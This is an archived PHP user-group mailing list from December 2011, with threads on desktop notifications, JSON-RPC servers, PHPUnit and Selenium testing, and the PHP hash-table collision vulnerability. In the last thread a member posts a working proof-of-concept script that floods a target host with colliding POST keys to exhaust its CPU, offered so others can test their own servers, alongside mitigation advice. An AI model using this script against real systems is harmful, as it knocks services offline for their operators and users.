From seesgeez at gmail.com Thu Dec 1 13:25:02 2011 From: seesgeez at gmail.com (Carla Gomez) Date: Thu, 1 Dec 2011 13:25:02 -0500 Subject: [nycphp-talk] Desktop timed notice Message-ID: <30A6CFA5-A941-4E84-A5DC-D1B0DF016FAA@gmail.com> I am interested in notifying desktop users that it is time to fill out a survey. How may I go about this notification that will come at set times with a link to the website? Sent from my iPhone From appel at alsjeblaft.nl Thu Dec 1 13:39:37 2011 From: appel at alsjeblaft.nl (Ap | Alsjeblaft!) Date: Thu, 1 Dec 2011 19:39:37 +0100 Subject: [nycphp-talk] Desktop timed notice In-Reply-To: <30A6CFA5-A941-4E84-A5DC-D1B0DF016FAA@gmail.com> References: <30A6CFA5-A941-4E84-A5DC-D1B0DF016FAA@gmail.com> Message-ID: Snail mail? -- *Alsjeblaft!* webdevelopment Stuff I've built: wende.nu, happycampermusic.com, dazzledkid.com, arthurjussen.nl, schradinova.nl, roomeleven.nl & studiopino.nl appel at alsjeblaft.nl http://www.alsjeblaft.nl/ On Thu, Dec 1, 2011 at 7:25 PM, Carla Gomez wrote: > I am interested in notifying desktop users that it is time to fill out a > survey. How may I go about this notification that will come at set times > with a link to the website? > > Sent from my iPhone > _______________________________________________ > New York PHP Users Group Community Talk Mailing List > http://lists.nyphp.org/mailman/listinfo/talk > > http://www.nyphp.org/Show-Participation > -------------- next part -------------- An HTML attachment was scrubbed... URL: From bruce.amick at gmail.com Thu Dec 1 13:42:16 2011 From: bruce.amick at gmail.com (bruce amick) Date: Thu, 1 Dec 2011 13:42:16 -0500 Subject: [nycphp-talk] Desktop timed notice In-Reply-To: <30A6CFA5-A941-4E84-A5DC-D1B0DF016FAA@gmail.com> References: <30A6CFA5-A941-4E84-A5DC-D1B0DF016FAA@gmail.com> Message-ID: Carla, Perhaps the quickest and easiest way would be to user gmail's calendar feature and set up a recurring appointment with a reminder email. Or... Hire a programmer. [?] -Bruce On Thu, Dec 1, 2011 at 1:25 PM, Carla Gomez wrote: > I am interested in notifying desktop users that it is time to fill out a > survey. How may I go about this notification that will come at set times > with a link to the website? > > Sent from my iPhone > _______________________________________________ > New York PHP Users Group Community Talk Mailing List > http://lists.nyphp.org/mailman/listinfo/talk > > http://www.nyphp.org/Show-Participation > -------------- next part -------------- An HTML attachment was scrubbed... URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: 330.gif Type: image/gif Size: 96 bytes Desc: not available URL: From seesgeez at gmail.com Thu Dec 1 13:48:18 2011 From: seesgeez at gmail.com (Carla Gomez) Date: Thu, 1 Dec 2011 13:48:18 -0500 Subject: [nycphp-talk] Desktop timed notice In-Reply-To: References: <30A6CFA5-A941-4E84-A5DC-D1B0DF016FAA@gmail.com> Message-ID: <4EF7CE38-9BFE-4841-831F-DB059BC61CD2@gmail.com> Thanks Bruce. Sent from my iPhone On Dec 1, 2011, at 1:42 PM, bruce amick wrote: > Carla, > > Perhaps the quickest and easiest way would be to user gmail's calendar feature and set up a recurring appointment with a reminder email. > > Or... > > Hire a programmer. > > <330.gif> > > -Bruce > > On Thu, Dec 1, 2011 at 1:25 PM, Carla Gomez wrote: > I am interested in notifying desktop users that it is time to fill out a survey. How may I go about this notification that will come at set times with a link to the website? > > Sent from my iPhone > _______________________________________________ > New York PHP Users Group Community Talk Mailing List > http://lists.nyphp.org/mailman/listinfo/talk > > http://www.nyphp.org/Show-Participation > > _______________________________________________ > New York PHP Users Group Community Talk Mailing List > http://lists.nyphp.org/mailman/listinfo/talk > > http://www.nyphp.org/Show-Participation -------------- next part -------------- An HTML attachment was scrubbed... URL: From winterbeef at gmail.com Fri Dec 2 17:02:44 2011 From: winterbeef at gmail.com (Wellington Fan) Date: Fri, 02 Dec 2011 17:02:44 -0500 Subject: [nycphp-talk] Favorite JSON-RPC Server? Message-ID: <4ED94B04.9000000@gmail.com> Hi all, Anyone have a favorite PHP implementation of a JSON-RPC Server? Thanks! -- wellington From rakics at gmail.com Fri Dec 2 17:13:31 2011 From: rakics at gmail.com (Sasa Rakic) Date: Fri, 2 Dec 2011 23:13:31 +0100 Subject: [nycphp-talk] Favorite JSON-RPC Server? In-Reply-To: <4ED94B04.9000000@gmail.com> References: <4ED94B04.9000000@gmail.com> Message-ID: http://json-rpc.org/wiki/implementations On Fri, Dec 2, 2011 at 11:02 PM, Wellington Fan wrote: > JSON-RPC Serve -------------- next part -------------- An HTML attachment was scrubbed... URL: From garyamort at gmail.com Wed Dec 21 13:37:03 2011 From: garyamort at gmail.com (Gary A Mort) Date: Wed, 21 Dec 2011 13:37:03 -0500 Subject: [nycphp-talk] Desktop timed notice In-Reply-To: <30A6CFA5-A941-4E84-A5DC-D1B0DF016FAA@gmail.com> References: <30A6CFA5-A941-4E84-A5DC-D1B0DF016FAA@gmail.com> Message-ID: <4EF2274F.3030807@gmail.com> There are soooo many ways to do this, it all depends on what mediums your users use already. Send them an email with a link at a specific time via: Email Instant Message[skype, aim, gtalk, yahoo, etc] Tweet it and have them follow the twitter feed Setup a website with desktop notifications enabled and have them keep that page open. http://technews.am/conversations/ajaxian/desktop_notifications_with_webkit If your users are predominantly Mac users, Growl is pretty cool http://growl.info/ and there is a windows, iphone, and android app for it as well On 12/1/2011 1:25 PM, Carla Gomez wrote: > I am interested in notifying desktop users that it is time to fill out a survey. How may I go about this notification that will come at set times with a link to the website? > > Sent from my iPhone > _______________________________________________ > New York PHP Users Group Community Talk Mailing List > http://lists.nyphp.org/mailman/listinfo/talk > > http://www.nyphp.org/Show-Participation From mkfmncom at gmail.com Wed Dec 21 17:46:53 2011 From: mkfmncom at gmail.com (M Kaufman (Gmail)) Date: Wed, 21 Dec 2011 14:46:53 -0800 Subject: [nycphp-talk] Desktop timed notice In-Reply-To: <4EF2274F.3030807@gmail.com> References: <30A6CFA5-A941-4E84-A5DC-D1B0DF016FAA@gmail.com> <4EF2274F.3030807@gmail.com> Message-ID: XMPP is the best way with the server running a prosody or ejabberd server. Do not use Twitter or Email nor rely on Webkit or any other proprietary networked solution outside of your control. You can use Zenity or XMPP to alert the desktop. XMPP is the preferred protocol since you are alerting users at their presence and availability. I provide consulting on these topics on retainer and can implement customized solutions at hardware, network, server, client machine and web Integrations to your existing or new setup at 1-703-881-6906, on or off site in the US Matthew Kaufman. Sent from my iPhone On Dec 21, 2011, at 10:37 AM, Gary A Mort wrote: > There are soooo many ways to do this, it all depends on what mediums your users use already. > > Send them an email with a link at a specific time via: > Email > Instant Message[skype, aim, gtalk, yahoo, etc] > Tweet it and have them follow the twitter feed > Setup a website with desktop notifications enabled and have them keep that page open. http://technews.am/conversations/ajaxian/desktop_notifications_with_webkit > > If your users are predominantly Mac users, Growl is pretty cool http://growl.info/ and there is a windows, iphone, and android app for it as well > > > > On 12/1/2011 1:25 PM, Carla Gomez wrote: >> I am interested in notifying desktop users that it is time to fill out a survey. How may I go about this notification that will come at set times with a link to the website? >> >> Sent from my iPhone >> _______________________________________________ >> New York PHP Users Group Community Talk Mailing List >> http://lists.nyphp.org/mailman/listinfo/talk >> >> http://www.nyphp.org/Show-Participation > > _______________________________________________ > New York PHP Users Group Community Talk Mailing List > http://lists.nyphp.org/mailman/listinfo/talk > > http://www.nyphp.org/Show-Participation From nelly at cgim.com Tue Dec 27 13:38:10 2011 From: nelly at cgim.com (Nelly Yusupova) Date: Tue, 27 Dec 2011 13:38:10 -0500 Subject: [nycphp-talk] Unit Testing with PHP: PHPUnit and Selenium Message-ID: Hello Everyone, We are setting up an environment for running unit tests for our PHP application. We installed PHPUnit testing framework and were thinking of using it with Selenium. There is lots of examples online of people who used PHPUnit & Selenium together but I've read that the support of PHP in Selenium is deprecated and I?m wondering if this is the right way to go. I would love to hear your experiences with PHP unit testing frameworks and if you are using unit testing, what does your set up look like. Thank you in advance for your responses. Sincerely, Nelly Yusupova Digitalwoman.com nelly at digitalwoman.com 917 603-9226 (phone) URL: http://www.digitalwoman.com Blog: http://www.webgrrls.com/blog/ Twitter: http://twitter.com/DigitalWoman -------------- next part -------------- An HTML attachment was scrubbed... URL: From rmarscher at beaffinitive.com Tue Dec 27 13:57:36 2011 From: rmarscher at beaffinitive.com (Rob Marscher) Date: Tue, 27 Dec 2011 13:57:36 -0500 Subject: [nycphp-talk] Unit Testing with PHP: PHPUnit and Selenium In-Reply-To: References: Message-ID: <03A2151D-92FB-46C7-AB2C-E1397ECB547D@beaffinitive.com> On Dec 27, 2011, at 1:38 PM, Nelly Yusupova wrote: > We are setting up an environment for running unit tests for our PHP application. > > We installed PHPUnit testing framework and were thinking of using it with Selenium. There is lots of examples online of people who used PHPUnit & Selenium together but I've read that the support of PHP in Selenium is deprecated and I?m wondering if this is the right way to go. > > I would love to hear your experiences with PHP unit testing frameworks and if you are using unit testing, what does your set up look like. I've yet to do it, but running a WebDriver server sounds pretty cool: http://code.google.com/p/selenium/wiki/RemoteWebDriverServer I'm pretty sure WebDriver is just the name for what Selenium has become. The php bindings have activity from this fall: http://code.google.com/p/php-webdriver-bindings/source/list I wouldn't really say that using Selenium or WebDriver would be considered a "unit test" as much as it is functional and/or integration testing. PHPUnit is still pretty good for testing and integrates well with continuous integration servers (I have it running with Atlassian Bamboo). I've been using the Lithium framework which also has a nice built-in test suite: http://lithify.me/docs/manual/quality-code/testing.wiki -Rob -------------- next part -------------- An HTML attachment was scrubbed... URL: From arzala at gmail.com Wed Dec 28 01:50:56 2011 From: arzala at gmail.com (Anirudhsinh Zala) Date: Wed, 28 Dec 2011 12:20:56 +0530 Subject: [nycphp-talk] Unit Testing with PHP: PHPUnit and Selenium In-Reply-To: References: Message-ID: <201112281220.56409.arzala@gmail.com> On Wednesday 28 December 2011 00:08:10 Nelly Yusupova wrote: > Hello Everyone, > > We are setting up an environment for running unit tests for our PHP > application. > > We installed PHPUnit testing framework and were thinking of using it with > Selenium. There is lots of examples online of people who used PHPUnit & > Selenium together but I've read that the support of PHP in Selenium is > deprecated and I?m wondering if this is the right way to go. > > I would love to hear your experiences with PHP unit testing frameworks and > if you are using unit testing, what does your set up look like. I suggest, from my experience, not to use Selenium and tools etc. to make/run unit tests because selenium is primarily to run funcitonal tests which are very different from unit tests. For unit tests, you would mostly use PHPUnit itself. So for now for unit testing of PHP bases code, PHPUnit is de-facto software. There are others but not as widely used as PHPUnit. Please find some generic guidelines below: 1. You should maintain hierarchy of classes as well as their equivalent test cases in same way. So for example if class file is grouped as lib/Validate/Numeric.php then it's corresponding test case should also be grouped as test/unit/Validate/NumericTest.php. Moreover name of test case class should also follow name of class that is to be tested as shown below: Class to be tested: Validate_Numeric Test case class: Validate_NumericTest Please check how frameworks like Zend etc. does it. 2. It is recommended to write test cases for logical part only i.e static code/data need not to get tested. For complex test cases such as for Database, Mailing etc., it may require certain environmental settings. 3. Fixtures (such as images, data files etc.) of test cases should be kept in same folder where test case/s reside/s. However larger contents can be put in separate folder. 4. All test cases are to be run from project's base directory only. This is necessary because it is required to generate agile documentation of unit tests cases and their classes. 5: All test cases should also be grouped into suite to run all of them at a time. My advice is not to use Selenium etc. for unit testing at all as Selenium is best suited for functional tests only. Thanks @anirudh > > Thank you in advance for your responses. > > Sincerely, > Nelly Yusupova > Digitalwoman.com > nelly at digitalwoman.com > 917 603-9226 (phone) > URL: http://www.digitalwoman.com > Blog: http://www.webgrrls.com/blog/ > Twitter: http://twitter.com/DigitalWoman > > From ramons at gmx.net Wed Dec 28 08:45:38 2011 From: ramons at gmx.net (David Krings) Date: Wed, 28 Dec 2011 08:45:38 -0500 Subject: [nycphp-talk] Unit Testing with PHP: PHPUnit and Selenium In-Reply-To: References: Message-ID: <4EFB1D82.50808@gmx.net> On 12/27/2011 1:38 PM, Nelly Yusupova wrote: > Hello Everyone, > > We are setting up an environment for running unit tests for our PHP application. > > We installed PHPUnit testing framework and were thinking of using it with > Selenium. Hi! While I have no experience with these two test frameworks, I did use automated test tools and test frameworks before and my experience so far is that you just end up with more code that contains bugs, the ones in your code and the ones in the test tool. Nevertheless, I see a place for automated testing, but that is not in new development. Write detailed test plans for all new development and run the first few rounds of testing manually, from unit test for functional tests to whatever else someone came up with a name for test. Once you have documented evidence that the code is fine and fulfills all the requirements, then use the test plans to write the automated tests. Once the automation is in place, run it and test the results it produces against the test plan. Only after the manual and automatic text results match you can continue using exclusively the automated tests, which are then only running against established code and are used to make sure that any new development doesn't break any existing functionality. And those tests are then done in a matter of minutes saving time. Maybe this is the approach you already take, but many consider automated testing a 1:1 replacement for manual testing and writing test plans. While there may be some amount of problems detected that way, you will miss a lot. In either case, which procedure is to be used to test the test scripts? Automated testing? You need to put in a lot of effort up front to get reliable results from automated testing. The question is then if there is a point to that when products have a live span of a year, like most of the hot new web apps. There is no point in extensive testing when the whole thing is outdated shortly after, which is the reason why many (not all) of the Google and FB products (to just name a few) are of mediocre quality. It is a business decision. Just my 2 cents from over a decade of QA work.... David From hans at cyberxdesigns.com Thu Dec 29 11:19:33 2011 From: hans at cyberxdesigns.com (Hans C. Kaspersetz) Date: Thu, 29 Dec 2011 11:19:33 -0500 Subject: [nycphp-talk] Hash Table Vulnerability in PHP5 Message-ID: <006301ccc645$a6b73790$f425a6b0$@cyberxdesigns.com> Good morning, I hope everyone has seen the news about the Hash Table Vulnerability in lots of web scripting languages. You can read about it here: http://www.securityweek.com/hash-table-collision-attacks-could-trigger-ddos- massive-scale or here http://www.kb.cert.org/vuls/id/903934. It looks like PHP has addressed the issue (http://www.php.net/archive/2011.php#id2011-12-25-1) by providing a max var directive in the latest RC5 for 5.4.0. However, with all release candidates they are strongly advising against using it in production. What is the general consensus for mitigating this risk without moving to RC5? We are limiting the execution time of our scripts, however for upload scripts or processing intensive scripts we need to increase the execution time which I image would leave those scripts more vulnerable. Thanks, Hans Kaspersetz Cyber X Designs http://cyberxdesigns.com -------------- next part -------------- An HTML attachment was scrubbed... URL: From ben at projectskyline.com Thu Dec 29 11:33:20 2011 From: ben at projectskyline.com (Ben Sgro) Date: Thu, 29 Dec 2011 11:33:20 -0500 Subject: [nycphp-talk] Hash Table Vulnerability in PHP5 In-Reply-To: <006301ccc645$a6b73790$f425a6b0$@cyberxdesigns.com> References: <006301ccc645$a6b73790$f425a6b0$@cyberxdesigns.com> Message-ID: Hey, Don't allow posts w/> ~100 k/v pairs. Don't allow larger uploads then is necessary. As you mentioned, I guess limit script execution time. Right now, there's some snort signatures going around (Not sure if you run IDS, etc). I've also heard people mention a mod_rewrite regex to strip out these bads chars. I have a PoC here you can test against your servers: (And here also: http://koto.github.com/blog-kotowicz-net-examples/hashcollision/kill.html) 'Ez', '1' => 'FY', '2' => 'G8', '3' => 'H' . chr(23), '4' => 'D'.chr(122+33), ); // how long should the payload be $length = 7; $size = count($a); $post = ''; $max = pow($size,$length); for ($i = 0; $i < $max; $i++) { $s = str_pad(base_convert($i, 10, $size), $length, '0', STR_PAD_LEFT); $post .= '' . (urlencode(strtr($s, $a))) . '=&'; } return $post; } // hashcollider.php // by sk $post = doom(); $ch = curl_init(); $args = getopt("h:"); $host = $args['h']; curl_setopt($ch, CURLOPT_URL, $host); curl_setopt($ch, CURLOPT_POST, 1 ); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); printf("[x] Target: %s\n", $host); printf("[x] CPU spike!\n"); $result=curl_exec ($ch); printf("[x] Payload sent.\n"); Good luck! - Ben On Dec 29, 2011, at 11:19 AM, Hans C. Kaspersetz wrote: > Good morning, > > I hope everyone has seen the news about the Hash Table Vulnerability in lots of web scripting languages. You can read about it here: http://www.securityweek.com/hash-table-collision-attacks-could-trigger-ddos-massive-scale or here http://www.kb.cert.org/vuls/id/903934. > > It looks like PHP has addressed the issue (http://www.php.net/archive/2011.php#id2011-12-25-1) by providing a max var directive in the latest RC5 for 5.4.0. However, with all release candidates they are strongly advising against using it in production. > > What is the general consensus for mitigating this risk without moving to RC5? > > We are limiting the execution time of our scripts, however for upload scripts or processing intensive scripts we need to increase the execution time which I image would leave those scripts more vulnerable. > > Thanks, > Hans Kaspersetz > Cyber X Designs > http://cyberxdesigns.com > > _______________________________________________ > New York PHP Users Group Community Talk Mailing List > http://lists.nyphp.org/mailman/listinfo/talk > > http://www.nyphp.org/Show-Participation -------------- next part -------------- An HTML attachment was scrubbed... URL: From hans at cyberxdesigns.com Thu Dec 29 18:19:32 2011 From: hans at cyberxdesigns.com (Hans C. Kaspersetz) Date: Thu, 29 Dec 2011 18:19:32 -0500 Subject: [nycphp-talk] Hash Table Vulnerability in PHP5 In-Reply-To: References: <006301ccc645$a6b73790$f425a6b0$@cyberxdesigns.com> Message-ID: <00ff01ccc680$52ab3fd0$f801bf70$@cyberxdesigns.com> Ben, Thanks for the reply. I ran the PoC below against my servers and it looks like we are in ok shape. After reading your response, I contemplated the options and realized that we are running Suhosin and are already managing the max post|request variables. Dur... Here is a bit more reading for the group: http://seclists.org/fulldisclosure/2011/Dec/486. Have a great new years! Hans Kaspersetz Cyber X Designs http://cyberxdesigns.com From: talk-bounces at lists.nyphp.org [mailto:talk-bounces at lists.nyphp.org] On Behalf Of Ben Sgro Sent: Thursday, December 29, 2011 11:33 AM To: NYPHP Talk Subject: Re: [nycphp-talk] Hash Table Vulnerability in PHP5 Hey, Don't allow posts w/> ~100 k/v pairs. Don't allow larger uploads then is necessary. As you mentioned, I guess limit script execution time. Right now, there's some snort signatures going around (Not sure if you run IDS, etc). I've also heard people mention a mod_rewrite regex to strip out these bads chars. I have a PoC here you can test against your servers: (And here also: http://koto.github.com/blog-kotowicz-net-examples/hashcollision/kill.html) 'Ez', '1' => 'FY', '2' => 'G8', '3' => 'H' . chr(23), '4' => 'D'.chr(122+33), ); // how long should the payload be $length = 7; $size = count($a); $post = ''; $max = pow($size,$length); for ($i = 0; $i < $max; $i++) { $s = str_pad(base_convert($i, 10, $size), $length, '0', STR_PAD_LEFT); $post .= '' . (urlencode(strtr($s, $a))) . '=&'; } return $post; } // hashcollider.php // by sk $post = doom(); $ch = curl_init(); $args = getopt("h:"); $host = $args['h']; curl_setopt($ch, CURLOPT_URL, $host); curl_setopt($ch, CURLOPT_POST, 1 ); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); printf("[x] Target: %s\n", $host); printf("[x] CPU spike!\n"); $result=curl_exec ($ch); printf("[x] Payload sent.\n"); Good luck! - Ben On Dec 29, 2011, at 11:19 AM, Hans C. Kaspersetz wrote: Good morning, I hope everyone has seen the news about the Hash Table Vulnerability in lots of web scripting languages. You can read about it here: http://www.securityweek.com/hash-table-collision-attacks-could-trigger-ddos- massive-scale or here http://www.kb.cert.org/vuls/id/903934. It looks like PHP has addressed the issue (http://www.php.net/archive/2011.php#id2011-12-25-1) by providing a max var directive in the latest RC5 for 5.4.0. However, with all release candidates they are strongly advising against using it in production. What is the general consensus for mitigating this risk without moving to RC5? We are limiting the execution time of our scripts, however for upload scripts or processing intensive scripts we need to increase the execution time which I image would leave those scripts more vulnerable. Thanks, Hans Kaspersetz Cyber X Designs http://cyberxdesigns.com _______________________________________________ New York PHP Users Group Community Talk Mailing List http://lists.nyphp.org/mailman/listinfo/talk http://www.nyphp.org/Show-Participation -------------- next part -------------- An HTML attachment was scrubbed... URL: From ben at projectskyline.com Thu Dec 29 19:41:08 2011 From: ben at projectskyline.com (Ben Sgro) Date: Thu, 29 Dec 2011 19:41:08 -0500 Subject: [nycphp-talk] Hash Table Vulnerability in PHP5 In-Reply-To: <00ff01ccc680$52ab3fd0$f801bf70$@cyberxdesigns.com> References: <006301ccc645$a6b73790$f425a6b0$@cyberxdesigns.com> <00ff01ccc680$52ab3fd0$f801bf70$@cyberxdesigns.com> Message-ID: <2AD511FA-D2F0-4CCE-81A8-9CF9839447B4@projectskyline.com> Hey Hans, Yeah Suhosin will take care of this issue. Glad to hear you are running it! - Ben On Dec 29, 2011, at 6:19 PM, Hans C. Kaspersetz wrote: > Ben, > > Thanks for the reply. I ran the PoC below against my servers and it looks like we are in ok shape. After reading your response, I contemplated the options and realized that we are running Suhosin and are already managing the max post|request variables. Dur?.. > > Here is a bit more reading for the group: http://seclists.org/fulldisclosure/2011/Dec/486. > > Have a great new years! > > Hans Kaspersetz > Cyber X Designs > http://cyberxdesigns.com > > > From: talk-bounces at lists.nyphp.org [mailto:talk-bounces at lists.nyphp.org] On Behalf Of Ben Sgro > Sent: Thursday, December 29, 2011 11:33 AM > To: NYPHP Talk > Subject: Re: [nycphp-talk] Hash Table Vulnerability in PHP5 > > Hey, > > Don't allow posts w/> ~100 k/v pairs. Don't allow larger uploads then is necessary. As you mentioned, I guess limit script execution time. > Right now, there's some snort signatures going around (Not sure if you run IDS, etc). I've also heard people mention a mod_rewrite regex > to strip out these bads chars. > > I have a PoC here you can test against your servers: (And here also: http://koto.github.com/blog-kotowicz-net-examples/hashcollision/kill.html) > > // v--- ripped from: https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision > // > // generate POST of Doom > function doom() { > // entries with collisions in PHP hashtable hash function > $a = array( > '0' => 'Ez', > '1' => 'FY', > '2' => 'G8', > '3' => 'H' . chr(23), > '4' => 'D'.chr(122+33), > ); > // how long should the payload be > $length = 7; > > $size = count($a); > > $post = ''; > $max = pow($size,$length); > for ($i = 0; $i < $max; $i++) { > $s = str_pad(base_convert($i, 10, $size), $length, '0', STR_PAD_LEFT); > $post .= '' . (urlencode(strtr($s, $a))) . '=&'; > } > > return $post; > } > > // hashcollider.php > // by sk > > $post = doom(); > $ch = curl_init(); > $args = getopt("h:"); > $host = $args['h']; > > curl_setopt($ch, CURLOPT_URL, $host); > curl_setopt($ch, CURLOPT_POST, 1 ); > curl_setopt($ch, CURLOPT_POSTFIELDS, $post); > > printf("[x] Target: %s\n", $host); > printf("[x] CPU spike!\n"); > $result=curl_exec ($ch); > printf("[x] Payload sent.\n"); > > Good luck! > > - Ben > > On Dec 29, 2011, at 11:19 AM, Hans C. Kaspersetz wrote: > > > Good morning, > > I hope everyone has seen the news about the Hash Table Vulnerability in lots of web scripting languages. You can read about it here: http://www.securityweek.com/hash-table-collision-attacks-could-trigger-ddos-massive-scale or here http://www.kb.cert.org/vuls/id/903934. > > It looks like PHP has addressed the issue (http://www.php.net/archive/2011.php#id2011-12-25-1) by providing a max var directive in the latest RC5 for 5.4.0. However, with all release candidates they are strongly advising against using it in production. > > What is the general consensus for mitigating this risk without moving to RC5? > > We are limiting the execution time of our scripts, however for upload scripts or processing intensive scripts we need to increase the execution time which I image would leave those scripts more vulnerable. > > Thanks, > Hans Kaspersetz > Cyber X Designs > http://cyberxdesigns.com > > _______________________________________________ > New York PHP Users Group Community Talk Mailing List > http://lists.nyphp.org/mailman/listinfo/talk > > http://www.nyphp.org/Show-Participation > > _______________________________________________ > New York PHP Users Group Community Talk Mailing List > http://lists.nyphp.org/mailman/listinfo/talk > > http://www.nyphp.org/Show-Participation -------------- next part -------------- An HTML attachment was scrubbed... URL: